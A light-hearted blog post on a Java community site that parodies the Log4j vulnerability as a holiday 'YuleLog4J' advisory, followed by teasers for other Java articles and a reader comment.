Author(s)
Christmas revelers and elves are urged to patch their fireplaces, as a Remote Combustion Effect (RCE) vulnerability has been discovered in the traditional holiday YuleLog4J. YuleLog4J is one of the most popular holiday celebrations, appearing in approximately 64% of fireplaces and streamed to millions of homes over Netflix and Amazon Prime.
The vulnerability occurs in the Jingle Naming and Directory Interface (JNDI), a utility that enables lookups of holiday cheer from remote sources. Unpatched versions of YuleLog4J can load potentially un-cheerful items such as coal, traditionally reserved as a stocking stuffer. The advisory was managed through coordinated disclosure between the North Pole and the GiftHub Security Research Team.
Additional vulnerabilities have been detected that may impact holiday celebrations. Previous version of YuleLog4J are also at risk of a Denial of Santa (DoS) vulnerability in recursive lookups based when paired with untrusted kindling.
Mitigating Your Risk
Patches to defend the RCE are available in YuleLog4J 2.17.0.
Additional recommendations for a safe holiday are available in the Code of the Elves:
- Treat every day like Christmas.
- There’s room for everyone on the nice list.
- The best way to spread Christmas cheer is singing loud for all to hear.
-
Java: Where the Wild Code Isn’t
In the last several years, the OpenJDK community has made Java significantly safer for users and developers while at the same time making it easier to design, build, and run applications quickly.
Java users should incorporate several practices to take full benefit from the defenses of the modern JRE.
Read More
-
Light Up your Christmas Tree with Java and Raspberry Pi
Are you a serious Java-developer looking for a fun project?
Or want to learn something completely new and use your Java-knowledge to control electronic components?
Here we go with this small project to get you introduced to the world of electronics programming!
Read More
-
Creating a JavaFX World Clock from Scratch (Part 1)
Welcome to Creating a JavaFX World Clock from Scratch (Part 1)! In this series of blog entries I would like to show you how I created a “sci-fi” looking world clock that happens to be a cross-platform Java desktop application.
Here I will explain my thought process, development workflow, and of course JavaFX code details. Since it’s still in the early stages, you can tune in by commenting or joining foojay’s Slack channel at foojay.slack.com [2], where I and others (Java experts & friends of OpenJDK/OpenJFX) can offer advice.
Read More
Author(s)
LOVE IT!!!